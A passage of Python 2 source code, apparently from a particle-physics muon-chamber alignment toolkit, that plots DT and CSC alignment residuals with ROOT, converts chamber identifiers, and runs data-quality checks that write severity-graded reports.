if r1.postal_address[0] == "DT":
if r1.postal_address[1:] in database1.dt:
found = True
db1 = database1.dt[r1.postal_address[1:]]
if database2 is None:
db2 = DTAlignable()
db2.x = db2.y = db2.z = db2.phix = db2.phiy = db2.phiz = 0.
db2.xx = db2.xy = db2.xz = db2.yx = db2.yy = db2.yz = db2.zx = db2.zy = db2.zz = 0.
else:
db2 = database2.dt[r1.postal_address[1:]]
else:
if r1.postal_address[1:] in database1.csc:
found = True
db1 = database1.csc[r1.postal_address[1:]]
if database2 is None:
db2 = CSCAlignable()
db2.x = db2.y = db2.z = db2.phix = db2.phiy = db2.phiz = 0.
db2.xx = db2.xy = db2.xz = db2.yx = db2.yy = db2.yz = db2.zx = db2.zy = db2.zz = 0.
else:
db2 = database2.csc[r1.postal_address[1:]]
if found and r1.status == "PASS" and r2.status == "PASS":
okay = False
if quantity == "phi":
if r1.deltax is not None and r2.deltax is not None and r1.deltax.error is not None and \
r2.deltax.error is not None and (r1.deltax.error**2 + r2.deltax.error**2) > 0.:
okay = True
values.append((db1.x - db2.x)/
signConventions[r1.postal_address][3] * 1000. * signConventions[r1.postal_address][0])
errors.append((r1.deltax.error**2 + r2.deltax.error**2)/
signConventions[r1.postal_address][3] * 1000. * signConventions[r1.postal_address][0])
elif quantity == "x":
if r1.deltax is not None and r2.deltax is not None and r1.deltax.error is not None and \
r2.deltax.error is not None and (r1.deltax.error**2 + r2.deltax.error**2) > 0.:
okay = True
values.append((db1.x - db2.x) * 10. * signConventions[r1.postal_address][0])
errors.append((r1.deltax.error**2 + r2.deltax.error**2) * 10. * signConventions[r1.postal_address][0])
elif quantity == "y":
if r1.deltay is not None and r2.deltay is not None and r1.deltay.error is not None and \
r2.deltay.error is not None and (r1.deltay.error**2 + r2.deltay.error**2) > 0.:
okay = True
values.append((db1.y - db2.y) * 10. * signConventions[r1.postal_address][1])
errors.append((r1.deltay.error**2 + r2.deltay.error**2) * 10. * signConventions[r1.postal_address][1])
elif quantity == "z":
if r1.deltaz is not None and r2.deltaz is not None and r1.deltaz.error is not None and \
r2.deltaz.error is not None and (r1.deltaz.error**2 + r2.deltaz.error**2) > 0.:
okay = True
values.append((db1.z - db2.z) * 10. * signConventions[r1.postal_address][2])
errors.append((r1.deltaz.error**2 + r2.deltaz.error**2) * 10. * signConventions[r1.postal_address][2])
elif quantity == "phix":
if r1.deltaphix is not None and r2.deltaphix is not None and r1.deltaphix.error is not None and \
r2.deltaphix.error is not None and (r1.deltaphix.error**2 + r2.deltaphix.error**2) > 0.:
okay = True
values.append((db1.phix - db2.phix) * 1000.)
errors.append((r1.deltaphix.error**2 + r2.deltaphix.error**2) * 1000.)
elif quantity == "phiy":
if r1.deltaphiy is not None and r2.deltaphiy is not None and r1.deltaphiy.error is not None and \
r2.deltaphiy.error is not None and (r1.deltaphiy.error**2 + r2.deltaphiy.error**2) > 0.:
okay = True
values.append((db1.phiy - db2.phiy) * 1000.)
errors.append((r1.deltaphiy.error**2 + r2.deltaphiy.error**2) * 1000.)
elif quantity == "phiz":
if r1.deltaphiz is not None and r2.deltaphiz is not None and r1.deltaphiz.error is not None and \
r2.deltaphiz.error is not None and (r1.deltaphiz.error**2 + r2.deltaphiz.error**2) > 0.:
okay = True
values.append((db1.phiz - db2.phiz) * 1000.)
errors.append((r1.deltaphiz.error**2 + r2.deltaphiz.error**2) * 1000.)
else: raise Exception
if okay:
if versus == "r": domain.append(signConventions[r1.postal_address][3])
elif versus == "phi": domain.append(signConventions[r1.postal_address][4])
elif versus == "z": domain.append(signConventions[r1.postal_address][5])
else: raise Exception
if versus == "r":
bkgndhist = ROOT.TH1F("bkgndhist", "", 100, 0., 800.)
bkgndhist.SetXTitle("R (cm)")
elif versus == "phi":
bkgndhist = ROOT.TH1F("bkgndhist", "", 100, -pi, pi)
bkgndhist.SetXTitle("#phi (rad)")
elif versus == "z":
bkgndhist = ROOT.TH1F("bkgndhist", "", 100, -1100., 1100.)
bkgndhist.SetXTitle("z (cm)")
bkgndhist.GetXaxis().CenterTitle()
bkgndhist.SetAxisRange(-window, window, "Y")
if quantity == "phi": bkgndhist.SetYTitle("#delta_{#phi} position (mrad)")
elif quantity == "x": bkgndhist.SetYTitle("#delta_{x'} (mm)")
elif quantity == "y": bkgndhist.SetYTitle("#delta_{y'} (mm)")
elif quantity == "z": bkgndhist.SetYTitle("#delta_{z'} (mm)")
elif quantity == "phix": bkgndhist.SetYTitle("#delta_{#phi_{x}} (mrad)")
elif quantity == "phiy": bkgndhist.SetYTitle("#delta_{#phi_{y}} (mrad)")
elif quantity == "phiz": bkgndhist.SetYTitle("#delta_{#phi_{z}} (mrad)")
else: raise Exception
bkgndhist.GetYaxis().CenterTitle()
if len(domain) == 0:
tgraph = ROOT.TGraphErrors(0)
else:
tgraph = ROOT.TGraphErrors(len(domain), array.array("d", domain), array.array("d", values),
array.array("d", [0.]*len(domain)), array.array("d", errors))
tgraph.SetMarkerColor(color)
tgraph.SetLineColor(color)
bkgndhist.Draw()
if tgraph.GetN() > 0: tgraph.Draw("p")
return bkgndhist, tgraph, domain, values, errors
######################################################################################################
def idToPostalAddress(id):
# only len==9 ids can correspond to valid postal address
if len(id)!=9: return None
if id[0:2]=="MB":
#print id
pa = ("DT", int(id[2:4]), int(id[5]), int(id[7:9]))
#print pa
if pa[1]<-2 or pa[1]>2: return None
if pa[2]>4: return None
if pa[3]<1 or pa[3]>14 or (pa[3]==4 and pa[3]>12): return None
return pa
elif id[0:2]=="ME":
if id[2]=="+": ec=1
elif id[2]=="-": ec=2
else: return None
pa = ("CSC", ec, int(id[3]), int(id[5]), int(id[7:9]))
if pa[2]<1 or pa[2]>4: return None
if pa[3]<1 or pa[3]>4 or (pa[2]>1 and pa[3]>2): return None
if pa[4]<1 or pa[4]>36 or (pa[2]>1 and pa[3]==1 and pa[4]>18): return None
return pa
else: return None
def postalAddressToId(postal_address):
if postal_address[0] == "DT":
wheel, station, sector = postal_address[1:]
w = "%+d"%wheel
if w=="+0": w = "-0"
return "MB%s/%d/%02d" % (w, station, sector)
elif postal_address[0] == "CSC":
endcap, station, ring, chamber = postal_address[1:]
if endcap != 1: station = -1 * abs(station)
return "ME%+d/%d/%02d" % (station, ring, chamber)
def nameToId(name):
if name[0:2] == "MB":
wh = name[4]
if wh == "A": w = "-2"
elif wh == "B": w = "-1"
elif wh == "C": w = "-0"
elif wh == "D": w = "+1"
elif wh == "E": w = "+2"
else: return ""
station = name[7]
sector = name[11:13]
return "MB%s/%s/%s" % (w, station, sector)
elif name[0:2] == "ME":
if name[2]=="p": endcap = "+"
elif name[2]=="m": endcap = "-"
else: return ""
station = name[3]
ring = name[4]
chamber = name[6:8]
return "ME%s%s/%s/%s" % (endcap, station, ring, chamber)
return None
def availableCellsDT(reports):
dts = []
# DT wheels
for iwheel in DT_TYPES:
if iwheel[1]=="ALL": continue
dts.append(iwheel[0])
# DT wheel & station
for wheel in DT_TYPES:
if wheel[1]=="ALL": continue
for station in wheel[2]:
dts.append(wheel[0]+'/'+station[1])
# DT station & sector
for wheel in DT_TYPES:
if wheel[1]!="ALL": continue
for station in wheel[2]:
for sector in range(1,station[2]+1):
ssector = "%02d" % sector
dts.append(wheel[0]+'/'+station[1]+'/'+ssector)
# DT station & ALL sectors
for wheel in DT_TYPES:
if wheel[1]!="ALL": continue
for station in wheel[2]:
dts.append(wheel[0]+'/'+station[1])
# DT chambers
for wheel in DT_TYPES:
if wheel[1]=="ALL": continue
for station in wheel[2]:
for sector in range(1,station[2]+1):
ssector = "%02d" % sector
label = "MBwh%sst%ssec%s" % (wheelLetter(int(wheel[1])),station[1],ssector)
if len(reports)==0:
# no reports case: do not include chambers
#dts.append(wheel[0]+'/'+station[1]+'/'+ssector)
continue
found = False
for r in reports:
if r.name == label:
found = True
break
if not found: continue
if r.status == "TOOFEWHITS" and r.posNum+r.negNum==0: continue
if r.status == "NOFIT": continue
dts.append(wheel[0]+'/'+station[1]+'/'+ssector)
return dts
def availableCellsCSC(reports):
cscs = []
# CSC station
for endcap in CSC_TYPES:
for station in endcap[2]:
cscs.append("%s%s" % (endcap[0], station[1]))
# CSC station & ring
for endcap in CSC_TYPES:
for station in endcap[2]:
for ring in station[2]:
if ring[1]=="ALL": continue
#label = "CSCvsphi_me%s%s%s" % (endcap[1], station[1], ring[1])
cscs.append("%s%s/%s" % (endcap[0], station[1],ring[1]))
# CSC station and chamber
for endcap in CSC_TYPES:
for station in endcap[2]:
for ring in station[2]:
if ring[1]!="ALL": continue
for chamber in range(1,ring[2]+1):
#label = "CSCvsr_me%s%sch%02d" % (endcap[1], station[1], chamber)
cscs.append("%s%s/ALL/%02d" % (endcap[0], station[1],chamber))
# CSC station and ALL chambers
for endcap in CSC_TYPES:
for station in endcap[2]:
for ring in station[2]:
if ring[1]!="ALL": continue
#label = "CSCvsr_me%s%schALL" % (endcap[1], station[1])
cscs.append("%s%s/ALL" % (endcap[0], station[1]))
# CSC chambers
for endcap in CSC_TYPES:
for station in endcap[2]:
for ring in station[2]:
if ring[1]=="ALL": continue
for chamber in range(1,ring[2]+1):
# exclude non instrumented ME4/2
if station[1]=="4" and ring[1]=="2":
if endcap[1]=="m": continue
if chamber<9 or chamber>13: continue
schamber = "%02d" % chamber
label = "ME%s%s%s_%s" % (endcap[1], station[1], ring[1], schamber)
if len(reports)==0:
# no reports case: do not include chambers
#cscs.append(endcap[0]+station[1]+'/'+ring[1]+'/'+schamber)
continue
found = False
for r in reports:
if r.name == label:
found = True
break
if not found: continue
if r.status == "TOOFEWHITS" and r.posNum+r.negNum==0: continue
if r.status == "NOFIT": continue
cscs.append(endcap[0]+station[1]+'/'+ring[1]+'/'+schamber)
return cscs
DQM_SEVERITY = [
{"idx":0, "name": "NONE", "color": "lightgreen", "hex":"#90EE90"},
{"idx":1, "name": "LOWSTAT05", "color": "lightgreen", "hex":"#96D953"},
{"idx":2, "name": "LOWSTAT075", "color": "lightgreen", "hex":"#94E26F"},
{"idx":3, "name": "LOWSTAT1", "color": "yellowgreen", "hex":"#9ACD32"},
{"idx":4, "name": "LOWSTAT", "color": "yellow", "hex":"#FFFF00"},
{"idx":5, "name": "TOLERABLE", "color": "lightpink", "hex":"#FFB6C1"},
{"idx":6, "name": "SEVERE", "color": "orange", "hex":"#FFA500"},
{"idx":7, "name": "CRITICAL", "color": "red", "hex":"#FF0000"}];
def addToTestResults(c,res):
if len(res)>0:
if c in TEST_RESULTS: TEST_RESULTS[c].extend(res)
else: TEST_RESULTS[c] = res
def testEntry(testID,scope,descr,severity):
s = 0
for sev in DQM_SEVERITY:
if sev["name"]==severity: s = sev["idx"]
return {"testID":testID,"scope":scope,"descr":descr,"severity":s}
def testZeroWithin5Sigma(x):
if abs(x[1])==0.: return 0.
pull = abs(x[0])/abs(x[1])
if pull <= 5: return 0.
else: return pull
def testDeltaWithin5Sigma(x,sx):
n = len(x)
res = []
dr = []
#print x
#print sx
for i in range(1,n+1):
x1 = x[i-1]
sx1 = sx[i-1]
x2 = x[0]
sx2 = sx[0]
if i<n:
x2 = x[i]
sx2 = sx[i]
sig1 = sqrt( (sx1[0]-sx1[1])**2 + x1[1]**2 )
sig2 = sqrt( (sx2[0]-sx2[1])**2 + x2[1]**2 )
df = abs(x1[0]-x2[0]) - 3*( sig1 + sig2 )
#df = abs(sx1[1]-sx2[0]) - 5*(abs(x1[1]) + abs(x2[1]))
#print i, df, '= abs(',sx1[1],'-',sx2[0],')-5*(abs(',x1[1],')+abs(',x2[1],'))'
dr.append(df)
if df > 0: res.append(i)
#print dr
#print res
return res
def doTestsForReport(cells,reports):
for c in cells:
# can a cell be converted to a chamber postal address?
postal_address = idToPostalAddress(c)
if not postal_address: continue
# is this chamber in _report?
found = False
for r in reports:
if r.postal_address == postal_address:
found = True
break
if not found: continue
# chamber's tests result
res = []
scope = postal_address[0]
# noting could be done if fitting fails
if r.status == "FAIL" or r.status == "MINUITFAIL":
res.append(testEntry("FAILURE",scope,r.status+" failure","CRITICAL"))
addToTestResults(c,res)
continue
# noting could be done if TOOFEWHITS
nseg = r.posNum + r.negNum
if r.status == "TOOFEWHITS" and nseg>0:
res.append(testEntry("LOW_STAT",scope,"low stat, #segments=%d"%nseg,"LOWSTAT"))
addToTestResults(c,res)
continue
# set shades of light green according to sidma(dx)
sdx = 10.*r.deltax.error
if sdx>0.5:
if sdx<0.75: res.append(testEntry("LOW_STAT_DDX05",scope,"low stat, delta(dx)=%f #segments=%d" % (sdx,nseg),"LOWSTAT05"))
elif sdx<1.: res.append(testEntry("LOW_STAT_DDX075",scope,"low stat, delta(dx)=%f #segments=%d" % (sdx,nseg),"LOWSTAT075"))
else: res.append(testEntry("LOW_STAT_DDX1",scope,"low stat, delta(dx)=%f #segments=%d" % (sdx,nseg),"LOWSTAT1"))
# check chi2
if r.redchi2 > 20.: #2.5:
res.append(testEntry("BIG_CHI2",scope,"chi2=%f>20" % r.redchi2,"TOLERABLE"))
# check medians
medx, meddx = 10.*r.median_x, 1000.*r.median_dxdz
#medy, meddy = 10.*r.median_y, 1000.*r.median_dydz
if medx>2: res.append(testEntry("BIG_MED_X",scope,"median dx=%f>2 mm"%medx,"SEVERE"))
#if medy>3: res.append(testEntry("BIG_MED_Y",scope,"median dy=%f>3 mm"%medy,"SEVERE"))
if meddx>2: res.append(testEntry("BIG_MED_DXDZ",scope,"median d(dx/dz)=%f>2 mrad"%meddx,"SEVERE"))
#if meddy>3: res.append(testEntry("BIG_MED_DYDZ",scope,"median d(dy/dz)=%f>3 mrad"%meddy,"SEVERE"))
# check residuals far from zero
isDTst4 = False
if postal_address[0] == "DT" and postal_address[2]==4: isDTst4 = True
dx, dy, dpy, dpz = 10.*r.deltax.value, 0., 1000.*r.deltaphiy.value, 1000.*r.deltaphiz.value
if not isDTst4: dy = 10.*r.deltay.value
if dx>0.2: res.append(testEntry("BIG_LAST_ITR_DX",scope,"dx=%f>0.2 mm"%dx,"CRITICAL"))
if dy>0.2: res.append(testEntry("BIG_LAST_ITR_DY",scope,"dy=%f>0.2 mm"%dy,"CRITICAL"))
if dpy>0.2: res.append(testEntry("BIG_LAST_ITR_DPHIY",scope,"dphiy=%f>0.2 mrad"%dpy,"CRITICAL"))
if dpz>0.2: res.append(testEntry("BIG_LAST_ITR_DPHIZ",scope,"dphiz=%f>0.2 mrad"%dpz,"CRITICAL"))
#if ddx>0.03: res.append(testEntry("BIG_DX",scope,"dphix=%f>0.03 mrad"%ddx,"CRITICAL"))
addToTestResults(c,res)
def doTestsForMapPlots(cells):
for c in cells:
res = []
scope = "zzz"
if c[0:2]=="MB": scope = "DT"
if c[0:2]=="ME": scope = "CSC"
if scope == "zzz":
print "strange cell ID: ", c
return None
if c in MAP_RESULTS_FITSIN:
t = MAP_RESULTS_FITSIN[c]
t_a = testZeroWithin5Sigma(t['a'])
t_s = testZeroWithin5Sigma(t['sin'])
t_c = testZeroWithin5Sigma(t['cos'])
if t_a+t_s+t_c >0:
descr = "map fitsin 5 sigma away from 0; pulls : a=%.2f sin=%.2f, cos=%.2f" % (t_a,t_s,t_c)
res.append(testEntry("MAP_FITSIN",scope,descr,"SEVERE"))
if c in MAP_RESULTS_SAWTOOTH:
t = MAP_RESULTS_SAWTOOTH[c]
t_a = testDeltaWithin5Sigma(t['a'],t['da'])
if len(t_a)>0:
descr = "map discontinuities: %s" % ",".join(map(str,t_a))
res.append(testEntry("MAP_DISCONTIN",scope,descr,"SEVERE"))
t_b = map(testZeroWithin5Sigma, t['b'])
t_bi = []
for i in range(0,len(t_b)):
if t_b[i]>0: t_bi.append(i+1)
if len(t_bi)>0:
descr = "map sawteeth: %s" % ",".join(map(str,t_bi))
res.append(testEntry("MAP_SAWTEETH",scope,descr,"TOLERABLE"))
addToTestResults(c,res)
def saveTestResultsMap(run_name):
if len(MAP_RESULTS_SAWTOOTH)+len(MAP_RESULTS_FITSIN)==0: return None
ff = open("tmp_test_results_map__%s.pkl" % run_name, "wb")
pickle.dump(MAP_RESULTS_SAWTOOTH, ff)
pickle.dump(MAP_RESULTS_FITSIN, ff)
ff.close()
def loadTestResultsMap(run_name):
print "tmp_test_results_map__%s.pkl" % run_name, os.access("tmp_test_results_map__%s.pkl" % run_name,os.F_OK)
if not os.access("tmp_test_results_map__%s.pkl" % run_name,os.F_OK): return None
global MAP_RESULTS_FITSIN, MAP_RESULTS_SAWTOOTH
ff = open("tmp_test_results_map__%s.pkl" % run_name, "rb")
MAP_RESULTS_SAWTOOTH = pickle.load(ff)
MAP_RESULTS_FITSIN = pickle.load(ff)
ff.close()
#execfile("tmp_test_results_map__%s.py" % run_name)
#print 'asasas', MAP_RESULTS_FITSIN
return True
def writeDQMReport(fname_dqm, run_name):
tests = []
for c in TEST_RESULTS:
tests.append({"objID":c, "name":c, "list":TEST_RESULTS[c]})
lt = time.localtime(time.time())
lts = "%04d-%02d-%02d %02d:%02d:%02d %s" % (lt[0], lt[1], lt[2], lt[3], lt[4], lt[5], time.tzname[1])
dqm_report = {"run":run_name, "genDate": lts, "report":tests}
ff = open(fname_dqm,mode="w")
print >>ff, "var DQM_REPORT = "
json.dump(dqm_report,ff)
#print >>ff, "];"
ff.close()
def doTests(reports, pic_ids, fname_base, fname_dqm, run_name):
# find available baseline
dts = []
cscs = []
if len(reports)>0:
dts = availableCellsDT(reports)
cscs = availableCellsCSC(reports)
elif len(pic_ids)>0:
dts = [id for id in pic_ids if 'MB' in id]
cscs = [id for id in pic_ids if 'ME' in id]
mulist = ['Run: '+run_name,['ALL',['MU']],['DT',dts],['CSC',cscs]]
ff = open(fname_base,mode="w")
print >>ff, "var MU_LIST = ["
json.dump(mulist,ff)
print >>ff, "];"
ff.close()
doTestsForReport(dts,reports)
doTestsForReport(cscs,reports)
loadTestResultsMap(run_name)
doTestsForMapPlots(dts)
doTestsForMapPlots(cscs)
writeDQMReport(fname_dqm, run_name)
######################################################################################################
def plotmedians(reports1, reports2, selection=None, binsx=100, windowx=5., ceilingx=None, binsy=100, windowy=5.,
ceilingy=None, binsdxdz=100, windowdxdz=5., ceilingdxdz=None, binsdydz=100, windowdydz=5., ceilingdydz=None,
r1text=" before", r2text=" after", which="median"):
tdrStyle.SetOptStat("emrou")
tdrStyle.SetStatW(0.40)
tdrStyle.SetStatFontSize(0.05)
global hmediandxdz_after, hmediandxdz_before, hmediandxdz_beforecopy, \
hmediandydz_after, hmediandydz_before, hmediandydz_beforecopy, \
hmedianx_after, hmedianx_before, hmedianx_beforecopy, \
hmediany_after, hmediany_before, hmediany_beforecopy, tlegend
hmedianx_before = ROOT.TH1F("hmedianx_before", "", binsx, -windowx, windowx)
hmediany_before = ROOT.TH1F("hmediany_before", "", binsy, -windowy, windowy)
hmediandxdz_before = ROOT.TH1F("hmediandxdz_before", "", binsdxdz, -windowdxdz, windowdxdz)
hmediandydz_before = ROOT.TH1F("hmediandydz_before", "", binsdydz, -windowdydz, windowdydz)
hmedianx_after = ROOT.TH1F("hmedianx_after", "", binsx, -windowx, windowx)
hmediany_after = ROOT.TH1F("hmediany_after", "", binsy, -windowy, windowy)
hmediandxdz_after = ROOT.TH1F("hmediandxdz_after", "", binsdxdz, -windowdxdz, windowdxdz)
hmediandydz_after = ROOT.TH1F("hmediandydz_after", "", binsdydz, -windowdydz, windowdydz)
if which == "median":
whichx = whichy = whichdxdz = whichdydz = "median"
elif which == "bigmean":
whichx = "mean30"
whichy = "mean30"
whichdxdz = "mean20"
whichdydz = "mean50"
elif which == "mean":
whichx = "mean15"
whichy = "mean15"
whichdxdz = "mean10"
whichdydz = "mean25"
elif which == "bigwmean":
whichx = "wmean30"
whichy = "wmean30"
whichdxdz = "wmean20"
whichdydz = "wmean50"
elif which == "wmean":
whichx = "wmean15"
whichy = "wmean15"
whichdxdz = "wmean10"
whichdydz = "wmean25"
elif which == "bigstdev":
whichx = "stdev30"
whichy = "stdev30"
whichdxdz = "stdev20"
whichdydz = "stdev50"
elif which == "stdev":
whichx = "stdev15"
whichy = "stdev15"
whichdxdz = "stdev10"
whichdydz = "stdev25"
else:
raise Exception(which + " not recognized")
for r1 in reports1:
if selection is None or (selection.__code__.co_argcount == len(r1.postal_address) and selection(*r1.postal_address)):
found = False
for r2 in reports2:
if r1.postal_address == r2.postal_address:
found = True
break
if not found: continue
#skip ME1/1a
if r1.postal_address[0]=='CSC':
if r1.postal_address[2]==1 and r1.postal_address[3]==4: continue
if r1.status == "PASS" and r2.status == "PASS":
hmedianx_before.Fill(10.*eval("r1.%s_x" % whichx))
hmediandxdz_before.Fill(1000.*eval("r1.%s_dxdz" % whichdxdz))
hmedianx_after.Fill(10.*eval("r2.%s_x" % whichx))
hmediandxdz_after.Fill(1000.*eval("r2.%s_dxdz" % whichdxdz))
if r1.median_y is not None:
hmediany_before.Fill(10.*eval("r1.%s_y" % whichy))
hmediandydz_before.Fill(1000.*eval("r1.%s_dydz" % whichdydz))
hmediany_after.Fill(10.*eval("r2.%s_y" % whichy))
hmediandydz_after.Fill(1000.*eval("r2.%s_dydz" % whichdydz))
hmedianx_beforecopy = hmedianx_before.Clone()
hmediany_beforecopy = hmediany_before.Clone()
hmediandxdz_beforecopy = hmediandxdz_before.Clone()
hmediandydz_beforecopy = hmediandydz_before.Clone()
hmedianx_beforecopy.SetLineStyle(2)
hmediany_beforecopy.SetLineStyle(2)
hmediandxdz_beforecopy.SetLineStyle(2)
hmediandydz_beforecopy.SetLineStyle(2)
hmedianx_before.SetFillColor(ROOT.kMagenta+2)
hmediany_before.SetFillColor(ROOT.kMagenta+2)
hmediandxdz_before.SetFillColor(ROOT.kMagenta+2)
hmediandydz_before.SetFillColor(ROOT.kMagenta+2)
hmedianx_after.SetFillColor(ROOT.kYellow)
hmediany_after.SetFillColor(ROOT.kYellow)
hmediandxdz_after.SetFillColor(ROOT.kYellow)
hmediandydz_after.SetFillColor(ROOT.kYellow)
hmedianx_after.SetXTitle("median(#Deltax) (mm)")
hmediany_after.SetXTitle("median(#Deltay) (mm)")
hmediandxdz_after.SetXTitle("median(#Deltadx/dz) (mrad)")
hmediandydz_after.SetXTitle("median(#Deltadydz) (mrad)")
hmedianx_after.GetXaxis().CenterTitle()
hmediany_after.GetXaxis().CenterTitle()
hmediandxdz_after.GetXaxis().CenterTitle()
hmediandydz_after.GetXaxis().CenterTitle()
if ceilingx is not None: hmedianx_after.SetAxisRange(0., ceilingx, "Y")
if ceilingy is not None: hmediany_after.SetAxisRange(0., ceilingy, "Y")
if ceilingdxdz is not None: hmediandxdz_after.SetAxisRange(0., ceilingdxdz, "Y")
if ceilingdydz is not None: hmediandydz_after.SetAxisRange(0., ceilingdydz, "Y")
c1.Clear()
c1.Divide(2, 2)
c1.GetPad(1).cd()
hmedianx_after.Draw()
hmedianx_before.Draw("same")
hmedianx_after.Draw("same")
hmedianx_beforecopy.Draw("same")
hmedianx_after.Draw("axissame")
tlegend = ROOT.TLegend(0.17, 0.75-0.05, 0.45+0.05, 0.9)
tlegend.SetFillColor(ROOT.kWhite)
tlegend.SetBorderSize(0)
tlegend.AddEntry(hmedianx_after, r2text, "f")
tlegend.AddEntry(hmedianx_before, r1text, "f")
tlegend.Draw()
c1.GetPad(2).cd()
hmediandxdz_after.Draw()
hmediandxdz_before.Draw("same")
hmediandxdz_after.Draw("same")
hmediandxdz_beforecopy.Draw("same")
hmediandxdz_after.Draw("axissame")
c1.GetPad(3).cd()
hmediany_after.Draw()
hmediany_before.Draw("same")
hmediany_after.Draw("same")
hmediany_beforecopy.Draw("same")
hmediany_after.Draw("axissame")
c1.GetPad(4).cd()
hmediandydz_after.Draw()
hmediandydz_before.Draw("same")
hmediandydz_after.Draw("same")
hmediandydz_beforecopy.Draw("same")
hmediandydz_after.Draw("axissame")
return hmediandxdz_after, hmediandxdz_before, hmediandxdz_beforecopy, \
hmediandydz_after, hmediandydz_before, hmediandydz_beforecopy, \
hmedianx_after, hmedianx_before, hmedianx_beforecopy, \
hmediany_after, hmediany_before, hmediany_beforecopy, tlegend
######################################################################################################
def createPeaksProfile(the2d, rebin=1):
htmp = ROOT.gROOT.FindObject(the2d.GetName()+"_peaks")
if htmp != None: htmp.Delete()
hpeaks = the2d.ProjectionX(the2d.GetName()+"_peaks")
hpeaks.Reset()
hpeaks.Rebin(rebin)
bad_fit_bins = []
for i in xrange(0, int(the2d.GetNbinsX()), rebin):
tmp = the2d.ProjectionY("tmp", i+1, i + rebin)
nn = tmp.GetEntries()
drange = tmp.GetRMS()
drange = 2.*drange
fgaus = ROOT.TF1("fgaus","gaus", tmp.GetMean() - drange, tmp.GetMean() + drange)
fgaus.SetParameter(0,nn)
fgaus.SetParameter(1,tmp.GetMean())
fgaus.SetParameter(2,tmp.GetRMS())
#print " ", i, nn, tmp.GetMean() , drange, "[", tmp.GetMean() - drange, tmp.GetMean() + drange, ']'
fitOk = False
if nn > 10: # good to fit
fr = tmp.Fit("fgaus","RNSQ")
#print " ", fgaus.GetParameter(1), " +- ", fgaus.GetParError(1), " fitres = " , fr.Status() , fr.CovMatrixStatus()
hpeaks.SetBinContent(i/rebin+1, fgaus.GetParameter(1))
hpeaks.SetBinError(i/rebin+1, fgaus.GetParError(1))
if fr.Status()==0 and fr.CovMatrixStatus()==3 : fitOk = True
if not fitOk:
bad_fit_bins.append(i/rebin+1)
if nn > 1. and tmp.GetRMS() > 0: # use mean
hpeaks.SetBinContent(i/rebin+1, tmp.GetMean())
hpeaks.SetBinError(i/rebin+1, ROOT.TMath.StudentQuantile(0.841345,nn) * tmp.GetRMS() / sqrt(nn))
else:
hpeaks.SetBinContent(i/rebin+1, 0.)
hpeaks.SetBinError(i/rebin+1, 0.)
if len(bad_fit_bins): print "createPeaksProfile bad fit bins: ", bad_fit_bins
return hpeaks
######################################################################################################
def mapplot(tfiles, name, param, mode="from2d", window=10., abscissa=None, title="",
widebins=False, fitsine=False, fitline=False, reset_palette=False, fitsawteeth=False, fitpeaks=False, peaksbins=1, fixfitpars={}, **args):
tdrStyle.SetOptTitle(1)
tdrStyle.SetTitleBorderSize(0)
tdrStyle.SetOptStat(0)
#tdrStyle.SetOptStat("emrou")
tdrStyle.SetOptFit(0)
tdrStyle.SetTitleFontSize(0.05)
tdrStyle.SetPadRightMargin(0.1) # to see the pallete labels on the left
c1.Clear()
c1.ResetAttPad()
if reset_palette: set_palette("blues")
global hist, hist2d, hist2dweight, tline1, tline2, tline3
if fitsine or fitsawteeth:
id = mapNameToId(name)
if not id:
print "bad id for ", name
raise Exception
hdir = "AlignmentMonitorMuonSystemMap1D/iter1/"
hpref= "%s_%s" % (name, param)
hhh = hdir+hpref
combine_all = False
if "ALL" in name and ("CSCvsr" in name or "DTvsz" in name): combine_all = True
add1d = ("vsphi" in name) and (param == "x")
if "h2d" in args:
hist2d = args["h2d"].Clone(hpref+"_2d_")
if "CSC" in name and add1d: hist1d = args["h1d"].Clone(hpref+"_1d_")
elif combine_all:
nch = 12
if "DT" in name and name[6:9]=='st4': nch = 14
if "CSC" in name: nch = 36
chambers = ["%02d" % ch for ch in range (2,nch+1)]
ch_hhh = hhh.replace('ALL','01')
ch_hpref = hpref.replace('ALL','01')
hist2d = tfiles[0].Get(ch_hhh+"_2d").Clone(ch_hpref+"_2d_")
if "CSC" in name and add1d: hist1d = tfiles[0].Get(ch_hhh+"_1d").Clone(ch_hpref+"_1d_")
for ch in chambers:
ch_hhh = hhh.replace('ALL',ch)
ch_hpref = hpref.replace('ALL',ch)
hist2d.Add(tfiles[0].Get(ch_hhh+"_2d"))
if "CSC" in name and add1d: hist1d.Add(tfiles[0].Get(ch_hhh+"_1d"))
for tfile in tfiles[1:]:
hist2d.Add(tfile.Get(ch_hhh+"_2d"))
if "CSC" in name and add1d: hist1d.Add(tfile.Get(ch_hhh+"_1d"))
else:
hist2d = tfiles[0].Get(hhh+"_2d").Clone(hpref+"_2d_")
if "CSC" in name and add1d: hist1d = tfiles[0].Get(hhh+"_1d").Clone(hpref+"_1d_")
for tfile in tfiles[1:]:
hist2d.Add(tfile.Get(hhh+"_2d"))
if "CSC" in name and add1d: hist1d.Add(tfile.Get(hhh+"_1d"))
if mode == "from2d":
the2d = hist2d
hist = the2d.ProjectionX()
hist.Reset()
skip = 1
if widebins:
hist.Rebin(10)
skip = 10
#f = ROOT.TF1("g", "gaus", -40., 40)
for i in xrange(0, int(the2d.GetNbinsX()), skip):
tmp = the2d.ProjectionY("tmp", i+1, i + skip)
if tmp.GetEntries() > 1:
#tmp.Fit("g","LNq")
hist.SetBinContent(i/skip+1, tmp.GetMean())
hist.SetBinError(i/skip+1, ROOT.TMath.StudentQuantile(0.841345,tmp.GetEntries()) * tmp.GetRMS() / sqrt(tmp.GetEntries()))
#hist.SetBinError(i/skip+1, tmp.GetRMS() / sqrt(tmp.GetEntries()))
#hist.SetBinError(i/skip+1, f.GetParameter(2))
else:
#hist.SetBinContent(i/skip+1, 2000.)
#hist.SetBinError(i/skip+1, 1000.)
hist.SetBinContent(i/skip+1, 0.)
hist.SetBinError(i/skip+1, 0.)
hpeaks = createPeaksProfile(the2d, peaksbins)
else:
raise Exception
hist.SetAxisRange(-window, window, "Y")
if abscissa is not None: hist.SetAxisRange(abscissa[0], abscissa[1], "X")
hist.SetMarkerStyle(20)
hist.SetMarkerSize(0.75)
hist.GetXaxis().CenterTitle()
hist.GetYaxis().CenterTitle()
hist.GetYaxis().SetTitleOffset(0.75)
hist.GetXaxis().SetTitleSize(0.05)
hist.GetYaxis().SetTitleSize(0.05)
hist.SetTitle(title)
if "vsphi" in name: hist.SetXTitle("Global #phi position (rad)")
elif "vsz" in name: hist.SetXTitle("Global z position (cm)")
elif "vsr" in name: hist.SetXTitle("Global R position (cm)")
if "DT" in name:
if param == "x": hist.SetYTitle("x' residual (mm)")
